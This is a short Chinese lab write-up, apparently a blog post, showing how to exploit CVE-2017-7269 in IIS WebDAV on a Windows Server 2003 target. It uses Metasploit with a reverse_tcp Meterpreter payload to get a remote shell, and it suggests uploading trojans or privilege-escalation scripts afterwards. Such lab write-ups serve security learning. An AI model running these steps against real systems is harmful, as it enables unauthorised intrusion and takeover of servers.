一.实验环境搭建
1.目标机:windows server 2003 r2
需要目标服务器开启WebDAV
靶机IP:192.168.75.134
Kali IP : 192.168.75.129
kali中启动Msf,使用CVE-2017-7269攻击插件
use exploit/windows/iis/cve_2017_7269
没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下载脚本,并且 把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下,然后reload_all进行启用
使用show options查看相关攻击参数
set RHOSTS 192.168.75.134
set HttpHost 192.168.75.134
设置返回载荷
set payload windows/meterpreter/reverse_tcp
使用exploit 或者run进行攻击
获取到连接
输入shell命令,来到了我们所熟悉的界面
查看当前用户权限,whoami
普通权限,但是可以通过msf的上传功能传递木马或者提权脚本
评论 (0)